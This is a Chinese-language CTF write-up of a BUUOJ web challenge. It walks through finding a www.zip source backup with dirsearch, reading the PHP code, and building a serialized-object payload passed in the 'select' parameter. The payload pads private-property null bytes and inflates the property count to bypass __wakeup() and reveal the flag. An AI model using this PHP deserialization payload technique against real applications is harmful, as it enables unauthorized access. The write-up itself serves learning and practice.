题目来源:
题目来源
https://buuoj.cn/
敏感备份文件
打开网址,这只小猫真的很好玩,前端大佬,膜!!!
根据他提示的信息,直接上dirsearch扫盘。
这文件可真够多的,不过我只需要备份文件。好!找到你了,www.zip。然后就是把这个文件下载下来了。
分析代码
先看看index.php里面,这里接收了一个GET参数。最重要的是unserialize(@$select),估计又离不开反序列化了。
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>然后分析class.php里的代码,这里定义了一个类,魔术方法__destruct()在销毁对象时使用,当该对象的username为admin且password为100时能够得到flag。
魔术方法__wakeup()在实例化对象时使用,这里将对象的$username赋值为guest,所以我们需要绕过他。
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
?>代码分析完毕,接下来思路就很清晰了,用GET方式传递一个经过序列化username为admin且password为100的对象实例,然后绕过魔术方法__wakeup(),即可拿下flag
序列化构造payload
跑一下这段脚本,得到我们需要的序列化后的对象。
代码语言:javascript复制<?php
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
this->password = $password;
}
}
$a = new Name('admin', 100);
var_dump(serialize($a));
?>运行结果为
代码语言:javascript复制O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}还没有结束,因为类的两个属性声明为private,所以需要补上00的空字符。
O:4:"Name":2:{s:14:"�Name�username";s:5:"admin";s:14:"�Name�password";i:100;}如何绕过__wakeup()呢?
当反序列化中对象属性的个数和真实的个数不等时,__wakeup() 就会被绕过。
所以最后的payload为
代码语言:javascript复制O:4:"Name":3:{s:14:"�Name�username";s:5:"admin";s:14:"�Name�password";i:100;}拿下flag
传参
代码语言:javascript复制?select=O:4:"Name":3:{s:14:"�Name�username";s:5:"admin";s:14:"�Name�password";i:100;}得到flag,收工。
